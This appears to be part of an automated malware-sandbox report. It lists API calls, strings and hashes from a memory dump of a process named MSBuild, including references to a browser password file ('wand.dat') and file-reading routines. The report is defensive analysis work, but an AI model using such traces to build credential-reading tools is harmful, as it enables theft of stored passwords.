                                                                                                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFilefreememset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2507021081-0
                                                                                                                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                            APIs
                                                                                                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                            • malloc.MSVCRT ref: 00417524
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                            • free.MSVCRT ref: 00417544
                                                                                                                                            • free.MSVCRT ref: 00417562
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4131324427-0
                                                                                                                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                            APIs
                                                                                                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                            • free.MSVCRT ref: 0041822B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PathTemp$free
                                                                                                                                            • String ID: %s\etilqs_$etilqs_
                                                                                                                                            • API String ID: 924794160-1420421710
                                                                                                                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpy
                                                                                                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                            • API String ID: 3510742995-272990098
                                                                                                                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0044A6EB
                                                                                                                                            • memset.MSVCRT ref: 0044A6FB
                                                                                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpymemset
                                                                                                                                            • String ID: gj
                                                                                                                                            • API String ID: 1297977491-4203073231
                                                                                                                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                            APIs
                                                                                                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                            • malloc.MSVCRT ref: 004174BD
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                            • free.MSVCRT ref: 004174E4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4053608372-0
                                                                                                                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                            APIs
                                                                                                                                            • GetParent.USER32(?), ref: 0040D453
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4247780290-0
                                                                                                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
• ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
• memset.MSVCRT ref: 004450CD
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
• CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
• String ID:
• API String ID: 1471605966-0
APIs
• memset.MSVCRT ref: 004100FB
• memset.MSVCRT ref: 00410112
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 00410141
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memset$_snwprintf_wcslwrwcscpy
• String ID: </%s>
• API String ID: 3400436232-259020660
APIs
• memset.MSVCRT ref: 0040D58D
• SetWindowTextW.USER32(?,?), ref: 0040D5BD
• EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
APIs
  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
• CreateFontIndirectW.GDI32(?), ref: 00401156
• SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
• SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.*$dat$wand.dat
• API String ID: 2618321458-1828844352
APIs
• memset.MSVCRT ref: 00412057
  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
• SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
• GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
• GetKeyState.USER32(00000010), ref: 0041210D
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: ExecuteMenuMessageSendShellStateStringmemset
• String ID:
• API String ID: 3550944819-0
APIs
• free.MSVCRT ref: 0040F561
• memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
• memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memcpy$free
• String ID: g4@
• API String ID: 2888793982-2133833424
APIs
• memset.MSVCRT ref: 004144E7
  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
• memset.MSVCRT ref: 0041451A
• GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
• String ID:
• API String ID: 1127616056-0
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76E1DF80,?,0041755F,?), ref: 00417452
• malloc.MSVCRT ref: 00417459
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76E1DF80,?,0041755F,?), ref: 00417478
• free.MSVCRT ref: 0041747F
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                            • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2678498856-0
                                                                                                                                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040F673
                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                            • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2754987064-0
                                                                                                                                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 764393265-0
                                                                                                                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                            APIs
                                                                                                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1386444988-0
                                                                                                                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                            APIs
                                                                                                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _snwprintfmemcpy
                                                                                                                                            • String ID: %2.2X
                                                                                                                                            • API String ID: 2789212964-323797159
                                                                                                                                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                            APIs
                                                                                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                            • free.MSVCRT ref: 0040B201
                                                                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                            • free.MSVCRT ref: 0040B224
                                                                                                                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 726966127-0
                                                                                                                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                            APIs
                                                                                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                            • free.MSVCRT ref: 0040B0FB
                                                                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                            • free.MSVCRT ref: 0040B12C
                                                                                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: free$memcpy$mallocstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3669619086-0
                                                                                                                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                            • malloc.MSVCRT ref: 00417407
                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                            • free.MSVCRT ref: 00417425
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2605342592-0
                                                                                                                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
